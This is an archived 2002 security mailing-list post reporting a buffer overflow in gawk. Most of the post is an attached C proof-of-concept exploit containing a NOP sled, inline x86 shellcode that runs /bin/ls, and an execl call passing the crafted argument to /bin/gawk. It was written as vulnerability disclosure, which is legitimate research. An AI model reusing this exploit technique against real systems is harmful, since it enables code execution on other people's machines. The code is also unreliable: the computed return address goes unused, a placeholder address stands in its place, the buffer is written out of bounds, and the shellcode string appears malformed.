about gawk
From: Gabriel A. Maggiotti (gmaggiot@ciudad.com.ar)Date: 03/15/02
- Previous message: Max: "RE: Buffer overflow in awk"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Fri, 15 Mar 2002 15:24:21 -0300 From: "Gabriel A. Maggiotti" <gmaggiot@ciudad.com.ar> To: research-list@qb0x.net, bugtraq@securityfocus.com, vuln-dev@securityfocus.com
I do a little research, and found that only accept ascci chars as arg
and if you try to put a shellcode in the arg nothing occurs.
I think if we store the shellcode in an env variable and write the ret
address pointing to env shellcode could work. I attach a prove I made.
/*
---------------------------------------------------------------------------
Web: http://qb0x.net Author: Gabriel A. Maggiotti
Date: March 15, 2002 E-mail: gmaggiot@ciudad.com.ar
---------------------------------------------------------------------------
*/
#include <stdio.h>
#define OFFSET 18215
#define NOP 0x90
#define RET_72 0xbfffc6f0
#define RET 0x41
int
main(int argc, char *argv[])
{
int i=0; char buf[OFFSET];
int c, ret;
char shellcode1[] =
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69/bin/ls";
ret = RET_72 - OFFSET;
for(i=0;i<=OFFSET-1 ;i++)
buf[i]=NOP;
*(int *) &buf[i] = RET;
memcpy(buf+131,shellcode1,strlen(shellcode1));
buf[0]='-';
buf[1]='f';
buf[2]=' ';
execl("/bin/gawk", "/bin/gawk", buf, NULL);
//puts(buf);
return 0;
}
- Previous message: Max: "RE: Buffer overflow in awk"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
